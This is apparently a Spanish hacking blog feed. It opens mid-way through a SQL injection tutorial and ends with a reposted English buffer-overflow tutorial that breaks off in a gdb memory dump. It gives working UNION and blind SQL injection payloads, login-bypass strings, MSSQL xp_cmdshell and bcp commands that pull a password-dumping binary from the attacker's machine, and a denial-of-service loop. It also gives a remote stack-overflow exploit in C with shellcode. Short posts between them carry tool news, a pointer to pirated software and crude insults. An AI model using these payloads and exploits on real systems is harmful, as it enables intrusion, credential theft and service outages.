Entonces FROM+INFORMATION_SCHEMA.COLUMNS lo que hace es mostrarnos el nombre de las columnas en la tabla 'CuentasUsuarios'.,ahora en vez de mostrarse el nombre de la tabla se mostrara el nombre de la columna en la tabla 'CuentasUsuarios'..

como en pasos anteriores tenemos un blanco especifico y ahora en este caso buscar la columna especifica:

[ www.webquenoesdelgobierno.com/articulos.asp?ArticuloID=-1+UNION+SELECT+1,2,3,nombre_columna,5+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+nombre_tabla='CuentasUsuarios'+AND+nombre_columna>'displayed_column'-- ]

como reiteradamente mencione antes,queremos buscar la columna especifica de igual manera que hicimos para conseguir la tabla de usuarios antes.,si lo que queremos son los usuarios y passwords pues sabemos que debemos buscar las columnas que tengan nombres similares a usuarios,passwords,user,pass,logeo,acceso etc.

el comando anterior lo que hace es mostrar la columna que va siguiente a la mostrada que habiamos sacado previamente, y como ya mencione en el paso de sacar las tablas repetiremos los pasos hasta dar con la columna que queremos.

y ya dimos supuestamente con las columnas que queriamos que se llaman 'usuario' 'acceso' no olvidemos estas columnas tampoco,asumiendo que apuntaron los resultados para tener nuestra inyeccion final recordamos que los datos serian asi

##################################
#Nombre de Tabla Columnas#
##################################
#CuentasUsuarios usuario #
# acceso #
##################################

[ www.webquenoesdelgobierno.com/articulos.asp?ArticuloID=-1+UNION+SELECT+1,2,3,usuario,5+FROM+CuentasUsuarios-- ]

Este comando nos muestra la primera data de la columna "usuarios" de la tabla "CuentasUsuarios".

Digamos que la pagina nos mostro 'Cascanola' xD

[ www.webquenoesdelgobierno.com/articulos.asp?ArticuloID=-1+UNION+SELECT+1,acceso,3+FROM+CuentasUsuarios+WHERE+usuario='Cascanola'-- ]

Este comando nos mostrara el password del usuario 'Cascanola' que esta guardado en la tabla 'CuentasUsuarios'.,entonces en nuestra pagina se nos tiene que haber mostrado el password del usuario que en nuestro ataque imaginario es "12345678" xD...

entonces al final de nuestro ataque nos logueamos con el usuario 'Cascanola' y el password '12345678' xD Ewww...

recordemos que este escenario solo es suponiendo las paginas y las consultas se aplicaran con la pura logica del usuario..

ok podemos aplicar mas o menos los mismos metodos en otro tpo de base de datos no nesesariamente sql server, mssql de mocosoft xD, en fin las tecnicas mas o menos iguales aqui una rapida introduccion la misma web escenario pero en php..

[ www.webquenoesdelgobierno.com/index.php?id=0 ]

lo mismo que ya deben saber despues de "=" es nuestro articulo por ende la consulta a la base de dato y que si fuera el caso que fuera vulnerable nuestra aplicacion la inyeccion va a partir de "=".,

esta vez usamos de ejemplo un formulario de logeo y lo primero que usaremos el articulo siendo "=0" sera

[ ‘OR 1=1--]

ok ya tenemos claro muchas cosillas debido a la lectura hasta este momento xD usaremos ese comando en los campos de logeo osea donde dice usuario y password,usemos otro ejemplo pero directo a la URL:

[ www.webquenoesdelgobierno.com/index.php?id=0 ‘OR 1=1-- ]

usualmente este lo usamos cuando es una inyeccion a ciegas que meramente hablaremos de ella mas adelante por consecuente haz de haber investigado de mas comandos SQL para sacar info dentro de las base de datos podemos usar muchos otros strings u comandos.

admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
‘hi or 1=1--

hay muchas tecnicas abarcadas dentro del tema de las inyecciones sql de las que podemos poner muchicimas pero no quiero aburrirlos en el tema repetitivo y algo que quiero recrdarles que dentro de la base de datos no solamente podemos atacar con inyecciones SQL los Buffer Overflows que es un Ataque bien interesante y uno de los metodos favoritos de este servidor se pueden realizar dentro de ellas pero por ahora eso es en otro capitulo.

es bien impotante recordar que muchas veces nos enontramos con tal aplicacion y ni sabemos que tipo de base de datos gestiona pero eso lo iras mejorando durante el camino si aun asi no sabes como dar con ella puedes intentar con zenmap es una herramienta indispensable a la hora de hacer pentesting.

Ahora sigamos con el tema de las inyecciones en este caso las inyecciones a ciegas o como se conoce en ingles Blind SQL Injection.,ok explico que es esto usualmente cuando inyectamos una aplicacion y manipulamos la base de datos usualmente nos da los errores tipicos que nos indican si es vulnerable o no.,a raiz de esto los adminsitradores solo prohibe la muestra de errores en la programacion para que no sean mostradas en el sitio web para prevenir futuros ataques.

saben que administradores esto no los salva del todo xD igual si no muestra los errores puede ser vulnerable a inyeccion a ciegas ;-)

ok vamos a nuestro escenario imaginario para explicar mas sobre el asunto.digamos que nuestra webquenoesdelgobierno tiene una seccion que le da la oportunidad a sus empleados a ver los memos en linea de la empresa que son publicados blablabla la historia que ustedes quieran:

[ www.webquenoesdelgobierno.com/memodat.jsp?memodatID=2 ]

entonces el comando que usara la web para buscar la data en la base de datos y mostrarse en la web sera este:

[ SELECT title, description,memoDate, body FROM memodats WHERE memodatID = 2 ]

y entonces el servidor respondera mostrando el 2 memo hecho por la empresa en forma de HTML para que pueda ser visualizado en dicha pagina (obviamente) y es lo que vemos con nuestros navegadores.

para probar si nuestra aplicacion es vulnerable traten de injectar un caracter mas despues del Parametro Comando WHERE y veamos que pasa?

[ www.webquenoesdelgobierno.com/memodat.jsp?memodatID=2 AND 1=1 ]

por resultado el website realiza la siguiente consulta:

[ SELECT title, description, memoDate, body FROM memodats WHERE memodatID = 2 AND 1=1 ]

si por resultado la pagina se muestro con el 2 memo o sea la pagina normal que vistes al principio antes de hacer esa consulta pues tenemos una apliccion vulnerable a inyeccion SQL a ciegas.,si la aplicacion no fuera vulnerable pues simplemente la pagina no mostraba el memo o sea nuestra pagina por que el usuario hizo una mala consulta a la base de datos.

Cuanod probamos la aplicacion el Parametro WHERE es predecible 1=1 siempre sera nuestro inicio por ende real (exite) pero no siempre sabemos si es true entonce por que no le preguntamos a la base de datos directamente?:

[ www.webquenoesdelgobierno.com/memodat.jsp?memodatID=2 AND USER_NAME() = 'dbo' ]

USER_NAME() s un parametro que te muestra el nombre del usuaro actual si el usuario actual es 'dbo' (el administrador) entonces el memo se mostrar (nuestra pagina) si no es asi no se mostrara tan sencillo como eso.

entonces podemos de muchas maneras seguir sacandole info a la aplicacion como nombre de la tabla un numero a la vez como la que ya aplicamos pero de otra manera:

[ www.webquenoesdelgobierno.com/memodat.jsp?memodatID=2 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1,1))) > 109 ]

El Parametrdentro de la consulta 'SELECT' pregunta el nombre de la primera tabla del usuario de la base datos que obviamente siempre es lo primero que queremos haces a la hora de sql injection.,el parametro dentro de la consulta substring() esta funcion nos mostrara el primer caracter de nuestra consulta, el parametro lower() dentro de la consulta lo que hace es convertir ese caracter en letra minuscula, y finalmente el parametro ascii() dentro de la consulta lo que hace es mostrarnos ese caracter en ascii o sea el valor ascii, claro? XD ehh

si el servidor nos responde mostrando la pagina que normalmente estabamos visualizando o sea el memo pues sabemos que la primera letra de la consulta esta despues de m en ascii es valor 109,haciendo algunas consultas podemos dar con el valor exacto de la letra.

[ www.webquenoesdelgobierno.com/memodat.jsp?memodatID=2 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1,1))) > 116 ]

si no se mostro nuestro memo (la pagina) pues el valor ascii es mayor que 109,pero menor que 116 la letra esta entre 'n' y 't'.

[ www.webquenoesdelgobierno.com/memodat.jsp?memodatID=2 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1,1))) > 113 ]

otro falso(pagina no mostrada) pues debe estar entre '110' y '113'.

[ www.webquenoesdelgobierno.com/memodat.jsp?memodatID=2 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1,1))) > 111 ]

falso nuevamente :O pues debe estar entre estas dos letras 'n' y 'o', entonces continuamos cambiando un poco la consulta:

[ www.webquenoesdelgobierno.com/memodat.jsp?memodatID=2 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1,1))) = 111 ]

El servidor nos muestra nuestro memo (pagina) asi que es positivo nuestro nombre de tabla en este caso es 'o' asi como la primera tabla de ella,para sacar la segunda letra repetiremos el proceso pero cambiaremos el parametro de consulta en substring() que el parametro seria el numero que va despues de 'xtype='U'),.

[ www.webquenoesdelgobierno.com/memodat.jsp?memodatID=2 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 2,1))) = 109 ]

Repitamos el proceso hasta que nos de la palabra completa el problema de las inyecciones SQL a ciegas (Blind) es que tienen que hacer Hartas peticiones para dar con su objetivo,algo que lo pueden arreglar mientras van puliendo sus tecnicas.

repasemos otra vez atras con lo fundamental y su ejercicio es aqui es imaginarse el escenario y analizar la estructura del codigo SQL para saber de que manera es vulnerable analizemos este codigo:

[SQLQuery = "SELECT Username FROM Users WHERE Username = '" &
strUsername & "' AND Password = '" & strPassword & "'"
strAuthCheck = GetQueryResult(SQLQuery)
If strAuthCheck = "" Then
boolAuthenticated = False
Else
boolAuthenticated = True
End If]

ahora ustedes ya deben saber que cuando nos encontramos con una forma de logeo y password este codigo o similar es lo que tenemos en la base de datos vulnerable,entonces cuando metes los datos de usuario la consulta verifica en las tablas si hay algunos datos que concuerden con la data que acabas de admitir. si la data es encontrada pues eso se guarda en la variable strAuthCheck indicando que el usuario debe ser autentificado,si se diera que el usuario que accedimos no concuerda con ninguna de la data de la base de datos entonces la variable strAuthCheck se queda vacia por que el usuario no puede ser autentificado.

si las variables strUsername y strPassword tienen algun caracter que usted quiere pues usteden pueden modificar la consulta SQL para que le devuelva el nombre que ustedes quieren,sin nesesidad de saber el password u/o el usuario.pero eso les quedo ya bien claro atraves de la lectura solo que lo enfatizo mas para que se hagan de una idea totalmente clara,pueden decir pero si ya explicastes eso arriba. no esta demas refrescar el cocote xD.

ok preparemos otro posible escenario pero esta vez en sql server y digamos que ya obtuvistes los datos que quieres,entonces quieres ganar priilegios dentro del servidor y subir archivos al mismo muchos de los puertos que se podrian utilizar el firewall los bloquea como lo son los puertos 137-139.,lo que haremos es subir un archivo binario en una tabla creada por ti mismo directo en la base de datos y luego saltandolo a los directorios del server. xD
una manera bien rara pero todavia funciona

entonces crearemos una tabla en el servidor:

[ create table TablaMaligna (data text) ]

Despues de haber creado la tabla subiremos nuestro binario a la mismisima tabla que hemos creado:

[ bulk insert TablaMaligna
from 'pwdump.exe'
with (codepage='RAW') ]

El binario podemos descargarlo de manera remota al servidor victima con el siguiente comando:

[ exec xp_cmdshell 'bcp "select * from TablaMaligna" queryout
pwdump.exe -c -Craw -ipnuestra -Rus -N3n3Bueno' ]

este comando va a suceder una conexion entrante a nuestra pc y escribiendo los comandos en el ejecutable que estamos recreando,en este escenario usaremos el protocolo por defecto asi como el puerto por defecto que puede ser que el firewall bloquee esa conexion entonces haremos:

[ exec xp_regwrite
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo',
'N3n3Bueno','REG_SZ','DBMSSOCN,ipnuestra,80'
]

luego :

[ exec xp_cmdshell 'bcp "select * from TablaMaligna" queryout
pwdump.exe -c -Craw -go0ns -Rus -N3n3Bueno' ]

el primer comando SQL configurara una conexion remota interactiva en el puerto -80 hacia nuestra maquina mientras el segundo comando SQL se conectara con nuestra maquina a traves del puerto -80 para descargar nuestro archivo binario..

entonces se preguntaran por que tanto revolu y tanta cosa pero lo que queremos enfatizar con este paper es cubrir el tema por completo en cada una de las tecnicas usadas.antes de llegar a usar los scanners y cosas y algo que veo bien comun es la costumbre de usar el SSS :O si ese mismo scanners que te arroja un 80% de falsos positivos a sabiendas que a manos pueden hacer muchicimas cosas.

ahora iremos algo mas teorico sobre esta vulnerabilidad para acabar con este capitulo a la hora de buscar la vulnerabilidad de esa aplicacion debemos tener bien en claro que el cliente debe comunicarse con el servidor y cuales son nuestros objetivos dentro de la ejecucion de la inyeccion.

despues de obtener los privilegios o que ya tengamos claro que la aplicacion es vulnerable podemos hacer muchas cosas inclusive un ataque de denegacion de servicio:

[ create table #tmp (x varchar(8000))
exec('insert into #tmp select ''X''')
while 1=1 exec('insert into #tmp select * from #tmp' ]

si haciendo esa consulta y manipulando los comandos podemos crear una tabla y correra con un loop infinito insertando variables en la tabla :O., las tablas temporeras se guardan en el sistema temporero de la base de datos y eventualmente nuestra base de datos temporal crecera resultando en el consumo de todos los recursos,y por ende el sistema cae al no poder comunicarse con la base de datos.
#######################################

las tecnicas son muchicimas y podemos continuar ire agregando mas tecnicas dado que la necesidad que vayan por un paso a paso en estos tiempos es imprecindible. continuaremos con el proximo capitulo y espero que esta introduccion les haya gustado. por ahora terminamos aqui a pasar a lo proximo
========================================

###########
#blood_rec#
###########

Para Ver Manual Completo Puede Verlo
Link
Link

BackTrack 4 Pre-Final Lanzada

noreply@blogger.com (Bryant Alston) — Fri, 19 Jun 2009 23:55:27 PDT

Todavia no es la version final ni nada por el estilo pero si hay un poco de avanze en el lanzamiento de la final.

El Gran Equipo de Remote Exploit a Anunciado El Lanzamiento de la Pre-Final De Este Maravilloso Sistema Operativo (Suite De Pentesting) ...Descrita como la mejor herramienta It en el mercAdo asi como lo mejor que puede tener un auditor de sistemas en sus manos sin nesesidad de agregar, o descargar aditivo si ya por si viene todo instalado.

Ya como anuncian los desarrolladores y como se hizo con la beta por favor reportes de bugs y comportamiento raro reportenlo ya que de esa manera se le da la mano a los desarrolladores a hacer los arreglos correspondientes para la version final.

para una lista de los cambios pueden descargar el PdF Aqui con un resumen de los arreglos y cambios de esta version Aqui .

Y para descargar la live cd pueden hacerlo desde Aqui, que es una Imagen .Iso DvD.

Los Sums De la Iso Pueden Encontrarlos Aqui Md5sum y sha256sum .

Por este medio Agradecer al Equipo De Remote-Exploit:
Max Moser
Mati Aharoni
Filip Waeytens
Joshua D. Abraham
y no puede faltar a un gran amigo
J. Martin Bos (pureh@te)

=====================================
gracias mi gente y esperemos a que salga la final mientras tanto prueben con esa...

salu2

Acunetix 6.5 Lanzado Scanner De Vulnerabilidades

noreply@blogger.com (Bryant Alston) — Fri, 19 Jun 2009 11:00:33 PDT

Ya saben que siempre tengo una guerra en contra de los scanners automatizados y mas aun en la plataforma de la mierda de Sistema Operativo Windows...pero cumplo al menos con dar la noticia.

y el Acunteix 6.5 fue lanzado supuestamente fueron arreglado y corregidos algunos bugs que tenia y se le hicieron una que otra mejora.

yo personalmente no lo e probado ni nada asi que realmente no puedo indicarles como es su performance en los servidores

tiene algunas cosas nuevas como recargar las paginas ey darle replay estilo live http headers o algo similar xD.

se le agregaron strings de sql injection para que todos los script kiddies que hay en la red se puedan divertir aun mas xD..asi como mas soporte para tomcat y otras aplicaciones webs realmente la interfaz no cambio practicamente es la misma que la pasada.

en fin mas herramientas para erradicar el elitismo de la la red o como dirian muchos enviandome mas mensajes

"es para hacer el trabajo mas facil,o para un auditor es una herramienta indispensable,los responsables de las auditorias IT saben que es lo mejor"

bla bla en fin pruebenla a ver lo mas lindo es el precio de la herramienta Aqui

pero nada que no se pueda conseguir por ahi como en warez bb o algo asi
salu2

Ak De Nuevo

noreply@blogger.com (Bryant Alston) — Fri, 24 Apr 2009 12:14:42 PDT

Bueno me estare dando la vuelta por aqui nuevamente ya que e estado muy ocupado recientemente con mi trabajo y mis funciones Mil.

gracias a los que se han preocupado por mi y han hechado sus bendiciones les agradezco de puro corazon.

a los "Haters" u Odiosos (que me odian) pues me pueden chupar mi gran verga,y conseguir una visa para que tengan 6 meses de ella xDDDDDDD lol sigan haciendo lo suyo que hago lo mio jajaja asi que ni se molesten y gasten energias en odiarme,me encantaria 2 minutos con cada uno de ellos que garantizadamente los OWNEO Facil.

y pues estare por aqui dandome la vueltita seguidamente les quiere...

blood_rec

" U Can Hate Me Now "
xDDDD

Remote Exploitation with C and Perl by Preddy [English]

noreply@blogger.com (Bryant Alston) — Thu, 19 Mar 2009 21:21:18 PDT

#RootShell Security Group#

Código:

-- Remote Exploitation with C and Perl by Preddy - RootShell Security Group

--[ Contents

1.1 - Goal
1.2 - Situation
1.3 - Vulnerable Daemon + Vulnerability analyses
1.4 - Payload/Code construction/analyses in C
1.5 - Payload/Code construction/analyses in Perl
1.6 - Conlusion
1.7 - Contact & Feedback

[1.1]--[ Goal

Hi, Preddy here , 17 year old turkish kid from holland,First of all sorry for my english , please do notify me of any spelling errors.
I would recommend you to read my previous tutorial about "Simple Buffer Overflows"
to avoid misunderstanding in this tutorial and to get a basic understanding of buffer overflows.
Our goal is to write two remote exploits , one in c and one in perl.
Both of the exploits, exploit a vulnerability in a small vulnerable daemon.
You would need perl installed(eg: ActivePerl for windows) and a compiler for c
(eg: cygwin for windows) you should have perl and a compiler package installed at your
linux distribution, you can install them with the following commands
(incase you haven't got it installed) :

To search for the perl package:

apt-cache search perl

then to install it:

apt-get install [perl-pkg-name]

you can do the same with the compiler package.

[1.2]--[ Situation

I have a laptop on my left side and a desktop on my right-hand side.
the laptop uses the following local ip address: 192.168.1.100
and the desktop uses: 192.168.1.101 as it's local ip address.
The laptop is the attacker in this situation and the desktop is our victim.
both run slackware 10.2 and have the VA patch turned off.

Turning the VA patch off:

cat /proc/sys/kernel/randomize_va_space
1
echo 0 > /proc/sys/kernel/randomize_va_space
cat /proc/sys/kernel/randomize_va_space
0

The desktop computer runs a vulnerable daemon on port 7500 which we have to exploit
and open its cd-rom drive with the payload. Once again it's a very basic stack overflow
and this should be a piece of cake for the average exploit writer but it's very
usefull for people who are just starting to write exploits and exploit buffer overflows.

[1.3]--[ Vulnerable Daemon + Vulnerability analyses

Our vulnerable daemon:

server.c
---

#include
#include
#include
#include
#include
#include
#include

#define LISTENPORT 7500

#define BACKLOG 10

#define MSG "Hello, how are you?"

int handle_reply(char *str)
{

char response[256];

strcpy(response,str);

printf("The client says \"%s\"\n",response);

return 0;

}

int main(int argc, char * argv[]) {
int sock, conn;
struct sockaddr_in my_addr, client_addr;
int sockopt_on = 1;
int sa_in_size = sizeof(struct sockaddr_in);
char reply[1024];

//get a socket
if ((sock = socket(AF_INET, SOCK_STREAM,0)) == -1) {
perror("socket");
exit(1);
}

//first zero the struct
memset((char *) &my_addr, 0, sa_in_size);

//now fill in the fields we need
my_addr.sin_family = AF_INET;
my_addr.sin_port = htons(LISTENPORT);
my_addr.sin_addr.s_addr = htonl(INADDR_ANY);

//bind our socket to the port
if (bind(sock,(struct sockaddr *)&my_addr, sa_in_size) == -1) {
perror("bind");
exit(1);
}

//start listening for incoming connections
if (listen(sock,BACKLOG) == -1) {
perror("listen");
exit(1);
}

while(1) {
//grab connections
conn = accept(sock, (struct sockaddr *)&client_addr, &sa_in_size);
if (conn == -1) {
perror("accept");
exit(1);
}

//log the connecter
printf("got connection from %s\n", inet_ntoa(client_addr.sin_addr));

//send a greeting
send(conn,MSG,strlen(MSG)+1,0);

//get the reply
recv(conn, reply, 1024, 0);

handle_reply(reply);

}

return 0;
}
---

This piece of code serves as a daemon and waits for people to connect,
on a successfull connection the server replies with a message and
waits for the user to reply back with his message.
The message get's stored in a buffer called 'reply' which can hold
1024 bytes of data.

the vulnerability lies in the handle_reply() function let's analyze it:

handle_reply()
---

int handle_reply(char *str)
{

char response[256];

strcpy(response,str);

printf("The client says \"%s\"\n",response);

return 0;

}
---

as you can see it has a response buffer which can hold 256 bytes of data
the reply message from the user gets copied in that buffer and the response
message is viewed at the server.

like this,

client:
---

telnet 192.168.1.101 7500
Trying 192.168.1.101...
Connected to 192.168.1.101.
Escape character is '^]'.
Hello, how are you?fine thanks how are you?

---

server:
---

got connection from 192.168.1.100
The client says "fine thanks how are you?
"
---

as you can see nothing special happens. But let's try to send a buffer which
is 272 bytes , which exceeds the buffersize of the response buffer in the handle_reply()
function.

[1.4]--[ Payload/Code construction/analyses in C

We want to send a 272 byte buffer to port 7500 of our victim (192.168.1.101)
so let's start by writing a simple piece of c code which can send 272 x A (0x41) to port
7500. Also don't forget to enable coredumps to analyze the overflow,

Enabling coredumps:

ulimit -c unlimited

Our overflow code:

send_overflow.c
---

/*

-- Send overflow (C version) written by Preddy

Part of Preddy's Remote Exploitation with C and Perl tutorial

Usage: ./send_overflow

Example: ./send_overflow 192.168.1.101

*/

/*
include headers which are required for a network connection
and other functionalities in the program
*/

#include
#include
#include
#include
#include
#include
#include

/*
define our remote port and the data which we are going to send
*/

#define REMPORT 7500
#define A 0x41

//Start with the program
int main(int argc,char **argv)
{

/* declare our variables */
int conn; //our connection variable, which will connect to the remote computer
int fd; // our socket file descriptor

//assign struct sockadd_in to remaddr
struct sockaddr_in remaddr;

//declare our payload buffer which will hold 272 bytes of data
char payload[272];

/*
check if the first commandline argument is given (the ip address)
if NOT print a message and exit
*/

if(!argv[1])
{

printf("Specify ip plz..\n");

exit(1);

}

/*
create the socket and also check for errors at creation
if an error is detected socket() will return -1
*/
if((fd = socket(AF_INET,SOCK_STREAM,0)) == -1)
{

perror("socket");

exit(1);

}

/*
this is going to overwrite the Extended Instruction Pointer
with 4 x 0x42 (BBBB -> 0x42 is also knows as B in its ascii form - http://www.lookuptables.com/)
*/

char *eip = "\x42\x42\x42\x42";

/*
fill our payload with 268 bytes of A (previously defined as 0x41)
*/

memset(payload,A,268);

/* fill the part after 268 bytes with our eip (BBBB - 0x42424242) */

memcpy(payload+268,eip,sizeof(eip));

/* connection information */
remaddr.sin_family = AF_INET; //domain
remaddr.sin_addr.s_addr = inet_addr(argv[1]); //remote connection address (our first argument - IP)
remaddr.sin_port = htons(REMPORT); //the remote port to connect to (previously defined as 7500)

/* this is where the actual connection take's place */

conn = connect(fd, (struct sockaddr_in *)&remaddr,sizeof(remaddr));

/* check the connection for errors as you know it returns -1 at errors */
if(conn < 0)
{

printf("Error: could not connect\n");
exit(1);
}

/* this is the part where our payload gets sent */

send(fd,payload,strlen(payload),0);

/* this is extra information which is displayed after sending the payload */

printf("Payload Size: %i\n",sizeof(payload));
printf("Payload Sent..\n");

}

---

Now we can start with compiling our program:

client:
---
gcc send_overflow.c -o send_overflow

./send_overflow 192.168.1.101
Payload Size: 272
Payload Sent..
---

server:
---

got connection from 192.168.1.100
The client says "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB"
Segmentation fault (core dumped)
bash-3.00# gdb -c core ./server
GNU gdb 6.3
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-slackware-linux"...Using host libthread_db library "/lib/tls/libthread_db.so.1".

Core was generated by `./server'.
Program terminated with signal 11, Segmentation fault.

warning: current_sos: Can't read pathname for load map: Input/output error

Reading symbols from /lib/tls/libc.so.6...done.
Loaded symbols for /lib/tls/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0 0x42424242 in ?? ()
(gdb) i r eip
eip 0x42424242 0x42424242
(gdb)

---

as you see we have overwritten the extended intruction pointer with our own
eip which we constructed before in our payload (char *eip = "\x42\x42\x42\x42";)
and its overwritten with exacly BBBB

so now we have to place our shellcode in our payload and also our nopsled.
and finish a huge part of the exploit.

server_exploit.c
---

/*

-- Remote "eject cd-rom" exploit (C version) written by Preddy

Part of Preddy's Remote Exploitation with C and Perl tutorial

Usage: ./server_exploit

Example: ./server_exploit 192.168.1.101

*/

/*
include headers which are required for a network connection
and other functionalities in the program
*/

#include
#include
#include
#include
#include
#include
#include

/*
define our remote port and the data which we are going to send
*/

#define REMPORT 7500
#define NOP 0x90
#define A 0x41

//Start with the program

int main(int argc,char **argv)
{

//Our shellcode which ejects the cd-rom drive..

/*
* (linux/x86) eject cd-rom (follows "/dev/cdrom" symlink) + exit() - 40 bytes
* - izik
*/

char scode[] =

"\x6a\x05" // push $0x5
"\x58" // pop %eax
"\x31\xc9" // xor %ecx,%ecx
"\x51" // push %ecx
"\xb5\x08" // mov $0x8,%ch
"\x68\x64\x72\x6f\x6d" // push $0x6d6f7264
"\x68\x65\x76\x2f\x63" // push $0x632f7665
"\x68\x2f\x2f\x2f\x64" // push $0x642f2f2f
"\x89\xe3" // mov %esp,%ebx
"\xcd\x80" // int $0x80
"\x89\xc3" // mov %eax,%ebx
"\xb0\x36" // mov $0x36,%al
"\x66\xb9\x09\x53" // mov $0x5309,%cx
"\xcd\x80" // int $0x80
"\x40" // inc %eax
"\xcd\x80"; // int $0x80

/* declare our variables */
int conn; //our connection variable, which will connect to the remote computer
int fd; // our socket file descriptor

//assign struct sockadd_in to remaddr
struct sockaddr_in remaddr;

//declare our payload buffer which will hold 272 bytes of data
char payload[272];

/*
check if the first commandline argument is given (the ip address)
if NOT print a message and exit
*/

if(!argv[1])
{

printf("Specify ip plz..\n");

exit(1);

}

/*
create the socket and also check for errors at creation
if an error is detected socket() will return -1
*/

if((fd = socket(AF_INET,SOCK_STREAM,0)) == -1)
{

perror("socket");

exit(1);

}

/*
this is going to overwrite the Extended Instruction Pointer
with 4 x 0x42 (BBBB -> 0x42 is also knows as B in its ascii form - http://www.lookuptables.com/)
*/

char *eip = "\x42\x42\x42\x42";

/*

Shellcode size: 40 bytes

272 bytes used to overwrite eip with 0x42424242

eip = 4 bytes

272 -4 = 268
268 - 40 = 228
Nopsled = 228 bytes

*/

memset(payload,NOP,228); //construct the nopsled
memcpy(payload+228,scode,sizeof(scode)); //place our shellcode after the nopsled
memcpy(payload+268,eip,sizeof(eip)); //place eip after our shellcode

/*

structure:

[NOPSLED - 228 BYTES] + [SHELLCODE - 40 BYTES] + [EIP - 4 BYTES] = 272 BYTES

*/

/* connection information */
remaddr.sin_family = AF_INET; //domain
remaddr.sin_addr.s_addr = inet_addr(argv[1]); //remote connection address (our first argument - IP)
remaddr.sin_port = htons(REMPORT); //the remote port to connect to (previously defined as 7500)

/* this is where the actual connection take's place */

conn = connect(fd, (struct sockaddr_in *)&remaddr,sizeof(remaddr));

/* check the connection for errors as you know it returns -1 at errors */
if(conn < 0)
{

printf("Error: could not connect\n");
exit(1);
}

/* this is the part where our payload gets sent */

send(fd,payload,strlen(payload),0);

/* this is extra information which is displayed after sending the payload */

printf("Payload Size: %i\n",sizeof(payload));
printf("Payload Sent..\n");

}

---

Let's start compiling our exploit,

client:
---
gcc server_exploit.c -o server_exploit

./server_exploit 192.168.1.101
Payload Size: 272
Payload Sent..

---

server:
---

bash-3.00# ./server
got connection from 192.168.1.100
The client says "jX1?Qhdromhev/ch///d??ð6f? S? @?BBBB"
^[[?1;2cSegmentation fault (core dumped)
bash-3.00# gdb -c core ./server
GNU gdb 6.3
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-slackware-linux"...Using host libthread_db library "/lib/tls/libthread_db.so.1".

Core was generated by `./server'.
Program terminated with signal 11, Segmentation fault.

warning: current_sos: Can't read pathname for load map: Input/output error

Reading symbols from /lib/tls/libc.so.6...done.
Loaded symbols for /lib/tls/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0 0x42424242 in ?? ()
(gdb)
(gdb) i r eip
eip 0x42424242 0x42424242
(gdb) x/1000xb $esp
0xbffff2b0: 0x02 0x00 0xff 0xbf 0xc0 0xf2 0xff 0xbf
0xbffff2b8: 0x00 0x04 0x00 0x00 0x00 0x00 0x00 0x00
0xbffff2c0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff2c8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff2d0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff2d8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff2e0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff2e8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff2f0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff2f8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff300: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff308: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff310: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff318: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff320: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff328: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff330: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff338: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff340: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff348: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff350: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff358: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff360: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff368: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff370: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff378: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff380: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
